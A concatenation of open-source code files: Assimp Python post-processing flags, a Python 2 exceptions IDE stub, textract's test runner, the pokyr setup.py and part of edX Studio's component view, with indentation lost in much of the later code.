# usually fixes them all and makes them renderable.
#
aiProcess_OptimizeGraph = 0x400000
## <hr>This step flips all UV coordinates along the y-axis and adjusts
# material settings and bitangents accordingly.
#
# <b>Output UV coordinate system:<b>
# @code
# 0y|0y ---------- 1x|0y
# | |
# | |
# | |
# 0x|1y ---------- 1x|1y
# @endcode
#
# You'll probably want to consider this flag if you use Direct3D for
# rendering. The #aiProcess_ConvertToLeftHanded flag supersedes this
# setting and bundles all conversions typically required for D3D-based
# applications.
#
aiProcess_FlipUVs = 0x800000
## <hr>This step adjusts the output face winding order to be CW.
#
# The default face winding order is counter clockwise (CCW).
#
# <b>Output face order:<b>
# @code
# x2
#
# x0
# x1
# @endcode
#
aiProcess_FlipWindingOrder = 0x1000000
## <hr>This step splits meshes with many bones into sub-meshes so that each
# su-bmesh has fewer or as many bones as a given limit.
#
aiProcess_SplitByBoneCount = 0x2000000
## <hr>This step removes bones losslessly or according to some threshold.
#
# In some cases (i.e. formats that require it) exporters are forced to
# assign dummy bone weights to otherwise static meshes assigned to
# animated meshes. Full, weight-based skinning is expensive while
# animating nodes is extremely cheap, so this step is offered to clean up
# the data in that regard.
#
# Use <tt>#AI_CONFIG_PP_DB_THRESHOLD<tt> to control this.
# Use <tt>#AI_CONFIG_PP_DB_ALL_OR_NONE<tt> if you want bones removed if and
# only if all bones within the scene qualify for removal.
#
aiProcess_Debone = 0x4000000
aiProcess_GenEntityMeshes = 0x100000
aiProcess_OptimizeAnimations = 0x200000
aiProcess_FixTexturePaths = 0x200000
## @def aiProcess_ConvertToLeftHanded
# @brief Shortcut flag for Direct3D-based applications.
#
# Supersedes the #aiProcess_MakeLeftHanded and #aiProcess_FlipUVs and
# #aiProcess_FlipWindingOrder flags.
# The output data matches Direct3D's conventions: left-handed geometry, upper-left
# origin for UV coordinates and finally clockwise face order, suitable for CCW culling.
#
# @deprecated
#
aiProcess_ConvertToLeftHanded = ( \
aiProcess_MakeLeftHanded | \
aiProcess_FlipUVs | \
aiProcess_FlipWindingOrder | \
0 )
## @def aiProcessPreset_TargetRealtimeUse_Fast
# @brief Default postprocess configuration optimizing the data for real-time rendering.
#
# Applications would want to use this preset to load models on end-user PCs,
# maybe for direct use in game.
#
# If you're using DirectX, don't forget to combine this value with
# the #aiProcess_ConvertToLeftHanded step. If you don't support UV transformations
# in your application apply the #aiProcess_TransformUVCoords step, too.
# @note Please take the time to read the docs for the steps enabled by this preset.
# Some of them offer further configurable properties, while some of them might not be of
# use for you so it might be better to not specify them.
#
aiProcessPreset_TargetRealtime_Fast = ( \
aiProcess_CalcTangentSpace | \
aiProcess_GenNormals | \
aiProcess_JoinIdenticalVertices | \
aiProcess_Triangulate | \
aiProcess_GenUVCoords | \
aiProcess_SortByPType | \
0 )
## @def aiProcessPreset_TargetRealtime_Quality
# @brief Default postprocess configuration optimizing the data for real-time rendering.
#
# Unlike #aiProcessPreset_TargetRealtime_Fast, this configuration
# performs some extra optimizations to improve rendering speed and
# to minimize memory usage. It could be a good choice for a level editor
# environment where import speed is not so important.
#
# If you're using DirectX, don't forget to combine this value with
# the #aiProcess_ConvertToLeftHanded step. If you don't support UV transformations
# in your application apply the #aiProcess_TransformUVCoords step, too.
# @note Please take the time to read the docs for the steps enabled by this preset.
# Some of them offer further configurable properties, while some of them might not be
# of use for you so it might be better to not specify them.
#
aiProcessPreset_TargetRealtime_Quality = ( \
aiProcess_CalcTangentSpace | \
aiProcess_GenSmoothNormals | \
aiProcess_JoinIdenticalVertices | \
aiProcess_ImproveCacheLocality | \
aiProcess_LimitBoneWeights | \
aiProcess_RemoveRedundantMaterials | \
aiProcess_SplitLargeMeshes | \
aiProcess_Triangulate | \
aiProcess_GenUVCoords | \
aiProcess_SortByPType | \
aiProcess_FindDegenerates | \
aiProcess_FindInvalidData | \
0 )
## @def aiProcessPreset_TargetRealtime_MaxQuality
# @brief Default postprocess configuration optimizing the data for real-time rendering.
#
# This preset enables almost every optimization step to achieve perfectly
# optimized data. It's your choice for level editor environments where import speed
# is not important.
#
# If you're using DirectX, don't forget to combine this value with
# the #aiProcess_ConvertToLeftHanded step. If you don't support UV transformations
# in your application, apply the #aiProcess_TransformUVCoords step, too.
# @note Please take the time to read the docs for the steps enabled by this preset.
# Some of them offer further configurable properties, while some of them might not be
# of use for you so it might be better to not specify them.
#
aiProcessPreset_TargetRealtime_MaxQuality = ( \
aiProcessPreset_TargetRealtime_Quality | \
aiProcess_FindInstances | \
aiProcess_ValidateDataStructure | \
aiProcess_OptimizeMeshes | \
0 )
| agpl-3.0 |
sabi0/intellij-community | python/testData/MockSdk2.7/python_stubs/exceptions.py | 27 | 24263 | # encoding: utf-8
# module exceptions
# from (built-in)
# by generator 1.138
"""
Python's standard exception class hierarchy.
Exceptions found here are defined both in the exceptions module and the
built-in namespace. It is recommended that user-defined exceptions
inherit from Exception. See the documentation for the exception
inheritance hierarchy.
"""
# no imports
# no functions
# classes
# NOTE: generated IDE stub (mock SDK) mirroring CPython 2's built-in
# exceptions module. Bodies are placeholders; only signatures and
# docstrings matter to the IDE.
class BaseException(object):
    """ Common base class for all exceptions """
    def __delattr__(self, name): # real signature unknown; restored from __doc__
        """ x.__delattr__('name') <==> del x.name """
        pass
    def __getattribute__(self, name): # real signature unknown; restored from __doc__
        """ x.__getattribute__('name') <==> x.name """
        pass
    def __getitem__(self, y): # real signature unknown; restored from __doc__
        """ x.__getitem__(y) <==> x[y] """
        pass
    def __getslice__(self, i, j): # real signature unknown; restored from __doc__
        """
        x.__getslice__(i, j) <==> x[i:j]
        Use of negative indices is not supported.
        """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    def __reduce__(self, *args, **kwargs): # real signature unknown
        pass
    def __repr__(self): # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass
    def __setattr__(self, name, value): # real signature unknown; restored from __doc__
        """ x.__setattr__('name', value) <==> x.name = value """
        pass
    def __setstate__(self, *args, **kwargs): # real signature unknown
        pass
    def __str__(self): # real signature unknown; restored from __doc__
        """ x.__str__() <==> str(x) """
        pass
    def __unicode__(self): # known case of exceptions.BaseException.__unicode__
        # no doc
        return u""
    # Tuple of arguments passed to the exception constructor.
    args = property(lambda self: tuple())
    """:type: tuple"""
    # Deprecated (PEP 352) Python 2 'message' attribute, kept for compatibility.
    message = property(lambda self: '', lambda self, v: None, lambda self: None)
    """:type: string"""
    __dict__ = None # (!) real value is ''
# The classes below reproduce CPython 2's built-in exception hierarchy
# (exceptions module). Each generated stub only carries the real class's
# docstring and placeholder __init__/__new__ signatures.
class Exception(BaseException):
    """ Common base class for all non-exit exceptions. """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
class StandardError(Exception):
    """
    Base class for all standard Python exceptions that do not represent
    interpreter exiting.
    """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
class ArithmeticError(StandardError):
    """ Base class for arithmetic errors. """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
class AssertionError(StandardError):
    """ Assertion failed. """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
class AttributeError(StandardError):
    """ Attribute not found. """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
class BufferError(StandardError):
    """ Buffer error. """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
class Warning(Exception):
    """ Base class for warning categories. """
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
class BytesWarning(Warning):
"""
Base class for warnings about bytes and buffer related problems, mostly
related to conversion from str or comparing to str.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class DeprecationWarning(Warning):
""" Base class for warnings about deprecated features. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class EnvironmentError(StandardError):
""" Base class for I/O related errors. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
errno = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception errno
:type: int
"""
filename = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception filename
:type: string
"""
strerror = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception strerror
:type: int
"""
class EOFError(StandardError):
""" Read beyond end of file. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class FloatingPointError(ArithmeticError):
""" Floating point operation failed. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class FutureWarning(Warning):
"""
Base class for warnings about constructs that will change semantically
in the future.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class GeneratorExit(BaseException):
""" Request that a generator exit. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ImportError(StandardError):
""" Import can't find module, or can't find name in module. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ImportWarning(Warning):
""" Base class for warnings about probable mistakes in module imports """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SyntaxError(StandardError):
""" Invalid syntax. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
filename = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception filename
:type: string
"""
lineno = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception lineno
:type: int
"""
msg = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception msg
:type: string
"""
offset = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception offset
:type: int
"""
print_file_and_line = property(lambda self: True, lambda self, v: None, lambda self: None)
"""exception print_file_and_line
:type: bool
"""
text = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception text
:type: string
"""
class IndentationError(SyntaxError):
""" Improper indentation. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class LookupError(StandardError):
""" Base class for lookup errors. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class IndexError(LookupError):
""" Sequence index out of range. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class IOError(EnvironmentError):
""" I/O operation failed. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class KeyboardInterrupt(BaseException):
""" Program interrupted by user. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class KeyError(LookupError):
""" Mapping key not found. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
class MemoryError(StandardError):
""" Out of memory. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class NameError(StandardError):
""" Name not found globally. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class RuntimeError(StandardError):
""" Unspecified run-time error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class NotImplementedError(RuntimeError):
""" Method or function hasn't been implemented yet. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class OSError(EnvironmentError):
""" OS system call failed. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class OverflowError(ArithmeticError):
""" Result too large to be represented. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class PendingDeprecationWarning(Warning):
"""
Base class for warnings about features which will be deprecated
in the future.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ReferenceError(StandardError):
""" Weak ref proxy used after referent went away. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class RuntimeWarning(Warning):
""" Base class for warnings about dubious runtime behavior. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class StopIteration(Exception):
""" Signal the end from iterator.next(). """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SyntaxWarning(Warning):
""" Base class for warnings about dubious syntax. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SystemError(StandardError):
"""
Internal error in the Python interpreter.
Please report this to the Python maintainer, along with the traceback,
the Python version, and the hardware/OS platform and version.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SystemExit(BaseException):
""" Request to exit from the interpreter. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
code = property(lambda self: object(), lambda self, v: None, lambda self: None)
class TabError(IndentationError):
""" Improper mixture of spaces and tabs. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class TypeError(StandardError):
""" Inappropriate argument type. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UnboundLocalError(NameError):
""" Local name referenced but not bound to a value. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ValueError(StandardError):
""" Inappropriate argument value (of correct type). """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UnicodeError(ValueError):
""" Unicode related error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UnicodeDecodeError(UnicodeError):
""" Unicode decoding error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
encoding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception encoding"""
end = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception end"""
object = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception object"""
reason = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception reason"""
start = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception start"""
class UnicodeEncodeError(UnicodeError):
""" Unicode encoding error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
encoding = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception encoding
:type: string
"""
end = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception end
:type: int
"""
object = property(lambda self: object(), lambda self, v: None, lambda self: None)
reason = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception reason
:type: string
"""
start = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception start
:type: int
"""
class UnicodeTranslateError(UnicodeError):
""" Unicode translation error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
encoding = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception encoding
:type: string
"""
end = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception end
:type: int
"""
object = property(lambda self: object(), lambda self, v: None, lambda self: None)
reason = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception reason
:type: string
"""
start = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception start
:type: int
"""
class UnicodeWarning(Warning):
"""
Base class for warnings about Unicode related problems, mostly
related to conversion problems.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UserWarning(Warning):
""" Base class for warnings generated by user code. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ZeroDivisionError(ArithmeticError):
""" Second argument to a division or modulo operation was zero. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
| apache-2.0 |
shobhitmittal/textract | tests/run.py | 7 | 1076 | #!/usr/bin/env python
"""Run the test suite that is specified in the .travis.yml file
"""
import os
import subprocess
import yaml
from textract.colors import green, red
root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def run_test(command):
wrapped_command = "cd %s && %s" % (root_dir, command)
pipe = subprocess.Popen(
wrapped_command, shell=True,
)
pipe.wait()
if pipe.returncode == 0:
print(green("TEST PASSED"))
else:
print(red("TEST FAILED"))
return pipe.returncode
# load the script tests from the .travis.yml file
with open(os.path.join(root_dir, '.travis.yml')) as stream:
travis_yml = yaml.load_all(stream.read())
config = travis_yml.next()
tests = config['script']
# run the tests
if isinstance(tests, (str, unicode)):
returncode = run_test(tests)
elif isinstance(tests, (list, tuple)):
returncode = 0
for test in tests:
returncode += run_test(test)
if returncode == 0:
print(green("ALL TESTS PASSED"))
else:
print(red("SOME TESTS FAILED, SEE ABOVE"))
| mit |
cleverpiggy/pokyr | setup.py | 1 | 1383 | """
Poker hand evaluating modules that provide fast enumerations.
Both C Extension module it's pure python analogies are included.
"""
from distutils.core import setup, Extension
import os
if not os.path.exists(os.path.join("src", "cpokertables.h")):
from poker import poker_lite
poker_lite.write_ctables(os.path.join("src", "cpokertables.h"))
sources = [
'src/build_table.c',
'src/cpokermod.c',
'src/deal.c',
'src/poker_heavy.c',
'src/poker_lite.c'
]
module = Extension(
'poker.cpoker',
sources=sources
)
long_description = "README at https://github.com/cleverpiggy/pokyr"
if os.path.exists("README.txt"):
with open("README.txt") as f:
long_description = f.read()
setup(
name='pokyr',
version='0.1.2',
ext_modules=[module],
packages=['poker'],
author='Allen Boyd Cunningham',
author_email='cleverfoundation@gmail.com',
url='https://github.com/cleverpiggy/pokyr',
description=__doc__,
long_description=long_description,
license='GPL',
classifiers=[
'Programming Language :: Python',
'Programming Language :: C',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Intended Audience :: Developers',
'Topic :: Games/Entertainment'
]
)
| gpl-3.0 |
wwj718/edx-platform | cms/djangoapps/contentstore/views/component.py | 4 | 14215 | from __future__ import absolute_import
import logging
from django.http import HttpResponseBadRequest, Http404
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_GET
from django.core.exceptions import PermissionDenied
from django.conf import settings
from opaque_keys import InvalidKeyError
from xmodule.modulestore.exceptions import ItemNotFoundError
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from xblock.core import XBlock
from xblock.django.request import webob_to_django_response, django_to_webob_request
from xblock.exceptions import NoSuchHandlerError
from xblock.fields import Scope
from xblock.plugin import PluginMissingError
from xblock.runtime import Mixologist
from contentstore.utils import get_lms_link_for_item
from contentstore.views.helpers import get_parent_xblock, is_unit, xblock_type_display_name
from contentstore.views.item import create_xblock_info, add_container_page_publishing_info
from opaque_keys.edx.keys import UsageKey
from student.auth import has_course_author_access
from django.utils.translation import ugettext as _
from models.settings.course_grading import CourseGradingModel
__all__ = [
'container_handler',
'component_handler'
]
log = logging.getLogger(__name__)
# NOTE: This list is disjoint from ADVANCED_COMPONENT_TYPES
COMPONENT_TYPES = ['discussion', 'html', 'problem', 'video']
ADVANCED_COMPONENT_TYPES = sorted(set(name for name, class_ in XBlock.load_classes()) - set(COMPONENT_TYPES))
ADVANCED_PROBLEM_TYPES = settings.ADVANCED_PROBLEM_TYPES
CONTAINER_TEMPLATES = [
"basic-modal", "modal-button", "edit-xblock-modal",
"editor-mode-button", "upload-dialog",
"add-xblock-component", "add-xblock-component-button", "add-xblock-component-menu",
"add-xblock-component-menu-problem", "xblock-string-field-editor", "publish-xblock", "publish-history",
"unit-outline", "container-message", "license-selector",
]
def _advanced_component_types():
"""
Return advanced component types which can be created.
"""
return [c_type for c_type in ADVANCED_COMPONENT_TYPES if c_type not in settings.DEPRECATED_ADVANCED_COMPONENT_TYPES]
def _load_mixed_class(category):
"""
Load an XBlock by category name, and apply all defined mixins
"""
component_class = XBlock.load_class(category, select=settings.XBLOCK_SELECT_FUNCTION)
mixologist = Mixologist(settings.XBLOCK_MIXINS)
return mixologist.mix(component_class)
@require_GET
@login_required
def container_handler(request, usage_key_string):
"""
The restful handler for container xblock requests.
GET
html: returns the HTML page for editing a container
json: not currently supported
"""
if 'text/html' in request.META.get('HTTP_ACCEPT', 'text/html'):
try:
usage_key = UsageKey.from_string(usage_key_string)
except InvalidKeyError: # Raise Http404 on invalid 'usage_key_string'
raise Http404
with modulestore().bulk_operations(usage_key.course_key):
try:
course, xblock, lms_link, preview_lms_link = _get_item_in_course(request, usage_key)
except ItemNotFoundError:
return HttpResponseBadRequest()
component_templates = get_component_templates(course)
ancestor_xblocks = []
parent = get_parent_xblock(xblock)
action = request.REQUEST.get('action', 'view')
is_unit_page = is_unit(xblock)
unit = xblock if is_unit_page else None
while parent and parent.category != 'course':
if unit is None and is_unit(parent):
unit = parent
ancestor_xblocks.append(parent)
parent = get_parent_xblock(parent)
ancestor_xblocks.reverse()
assert unit is not None, "Could not determine unit page"
subsection = get_parent_xblock(unit)
assert subsection is not None, "Could not determine parent subsection from unit " + unicode(unit.location)
section = get_parent_xblock(subsection)
assert section is not None, "Could not determine ancestor section from unit " + unicode(unit.location)
# Fetch the XBlock info for use by the container page. Note that it includes information
# about the block's ancestors and siblings for use by the Unit Outline.
xblock_info = create_xblock_info(xblock, include_ancestor_info=is_unit_page)
if is_unit_page:
add_container_page_publishing_info(xblock, xblock_info)
# need to figure out where this item is in the list of children as the
# preview will need this
index = 1
for child in subsection.get_children():
if child.location == unit.location:
break
index += 1
return render_to_response('container.html', {
'context_course': course, # Needed only for display of menus at top of page.
'action': action,
'xblock': xblock,
'xblock_locator': xblock.location,
'unit': unit,
'is_unit_page': is_unit_page,
'subsection': subsection,
'section': section,
'new_unit_category': 'vertical',
'ancestor_xblocks': ancestor_xblocks,
'component_templates': component_templates,
'xblock_info': xblock_info,
'draft_preview_link': preview_lms_link,
'published_preview_link': lms_link,
'templates': CONTAINER_TEMPLATES
})
else:
return HttpResponseBadRequest("Only supports HTML requests")
def get_component_templates(courselike, library=False):
"""
Returns the applicable component templates that can be used by the specified course or library.
"""
def create_template_dict(name, cat, boilerplate_name=None, tab="common", hinted=False):
"""
Creates a component template dict.
Parameters
display_name: the user-visible name of the component
category: the type of component (problem, html, etc.)
boilerplate_name: name of boilerplate for filling in default values. May be None.
hinted: True if hinted problem else False
tab: common(default)/advanced, which tab it goes in
"""
return {
"display_name": name,
"category": cat,
"boilerplate_name": boilerplate_name,
"hinted": hinted,
"tab": tab
}
component_display_names = {
'discussion': _("Discussion"),
'html': _("HTML"),
'problem': _("Problem"),
'video': _("Video")
}
component_templates = []
categories = set()
# The component_templates array is in the order of "advanced" (if present), followed
# by the components in the order listed in COMPONENT_TYPES.
component_types = COMPONENT_TYPES[:]
# Libraries do not support discussions
if library:
component_types = [component for component in component_types if component != 'discussion']
for category in component_types:
templates_for_category = []
component_class = _load_mixed_class(category)
# add the default template with localized display name
# TODO: Once mixins are defined per-application, rather than per-runtime,
# this should use a cms mixed-in class. (cpennington)
display_name = xblock_type_display_name(category, _('Blank')) # this is the Blank Advanced problem
templates_for_category.append(create_template_dict(display_name, category, None, 'advanced'))
categories.add(category)
# add boilerplates
if hasattr(component_class, 'templates'):
for template in component_class.templates():
filter_templates = getattr(component_class, 'filter_templates', None)
if not filter_templates or filter_templates(template, courselike):
# Tab can be 'common' 'advanced'
# Default setting is common/advanced depending on the presence of markdown
tab = 'common'
if template['metadata'].get('markdown') is None:
tab = 'advanced'
hinted = template.get('hinted', False)
templates_for_category.append(
create_template_dict(
_(template['metadata'].get('display_name')), # pylint: disable=translation-of-non-string
category,
template.get('template_id'),
tab,
hinted,
)
)
# Add any advanced problem types
if category == 'problem':
for advanced_problem_type in ADVANCED_PROBLEM_TYPES:
component = advanced_problem_type['component']
